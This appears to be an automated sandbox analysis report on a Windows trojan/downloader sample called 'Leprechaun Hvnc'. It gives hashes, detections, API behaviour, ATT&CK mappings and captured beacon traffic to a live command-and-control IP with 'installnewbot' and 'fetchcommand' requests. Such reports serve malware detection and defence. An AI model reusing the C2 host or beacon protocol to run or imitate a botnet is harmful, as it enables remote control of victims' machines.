Edit tour

Windows Analysis Report
Leprechaun Hvnc.bin.exe

Overview

General Information

Sample name:	Leprechaun Hvnc.bin.exe
Analysis ID:	1457367
MD5:	e497f871973ee2d1e1a42680efa369e3
SHA1:	a694ee791e04b0f60ed48e304a694faec9437e4d
SHA256:	3f58c4d27a63e7cac54346db50bde86788e6706e6f730cbff29862284f2150cb
Tags:	exeLeprechaunVNC
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

Leprechaun Hvnc.bin.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe" MD5: E497F871973EE2D1E1A42680EFA369E3)

cleanup

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Malware Analysis System Evasion
• Anti Debugging
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Leprechaun Hvnc.bin.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: Leprechaun Hvnc.bin.exe

ReversingLabs: Detection: 44%

Machine Learning detection for sample

Source: Leprechaun Hvnc.bin.exe

Joe Sandbox ML: detected

Source: Leprechaun Hvnc.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Leprechaun Hvnc.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: global traffic	HTTP traffic detected: GET /c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges=Admin HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109

Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknown	TCP traffic detected without corresponding DNS query: 65.20.106.109

Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Code function: 0_2_004919D0 GetProcessHeap,HeapAlloc,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,InternetReadFile,GetProcessHeap,HeapAlloc,HeapReAlloc,InternetReadFile,

0_2_004919D0

Source: global traffic	HTTP traffic detected: GET /c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges=Admin HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global traffic	HTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109

Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/Y.;S
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=1
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=2
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=4
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000145A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=8
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=D
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=GPDR
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=I
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=P
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=W
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=ndemandconnroutehelper.dll
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=oQ
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges

Source: Leprechaun Hvnc.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal60.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Mutant created: \Sessions\1\BaseNamedObjects\LeprechaunHvnc

Source: Leprechaun Hvnc.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Leprechaun Hvnc.bin.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Leprechaun Hvnc.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Leprechaun Hvnc.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Code function: 0_2_00491680 LoadLibraryW,GetProcAddress,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,VerSetConditionMask,VerifyVersionInfoW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,

0_2_00491680

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000141E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

0_2_00491680

Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

0_2_004919D0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe

Code function: 0_2_004912A0 GetProcessHeap,GetStdHandle,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,IsUserAnAdmin,lstrcpyW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,GetProcessHeap,HeapAlloc,RegCreateKeyW,RegSetKeyValueA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameA,lstrcmpW,GetProcessHeap,HeapAlloc,GetEnvironmentVariableA,lstrcatA,lstrcatA,CreateDirectoryA,lstrcatA,CopyFileA,RegCreateKeyW,RegSetKeyValueA,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

0_2_004912A0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 DLL Side-Loading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	11 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	1 System Owner/User Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	1 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Leprechaun Hvnc.bin.exe	45%	ReversingLabs	Win32.Trojan.Generic
Leprechaun Hvnc.bin.exe	100%	Avira	TR/Downloader.Gen
Leprechaun Hvnc.bin.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://65.20.106.109/c2.php?action=fetchcommand&botid=P	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=8	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=4	0%	Avira URL Cloud	safe
http://65.20.106.109/Y.;S	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=1	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=W	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=2	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=GPDR	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=ndemandconnroutehelper.dll	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=I	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=D	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges	0%	Avira URL Cloud	safe
http://65.20.106.109/c2.php?action=fetchcommand&botid=oQ	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://65.20.106.109/c2.php?action=fetchcommand&botid=8	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000145A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=GPDR	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/Y.;S	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=1	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=P	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=ndemandconnroutehelper.dll	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=2	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=4	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=W	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=I	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=oQ	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=D	Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
65.20.106.109	unknown	United States		199592	CP-ASDE	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1457367
Start date and time:	2024-06-14 16:40:07 +02:00
Joe Sandbox product:	CloudBasic
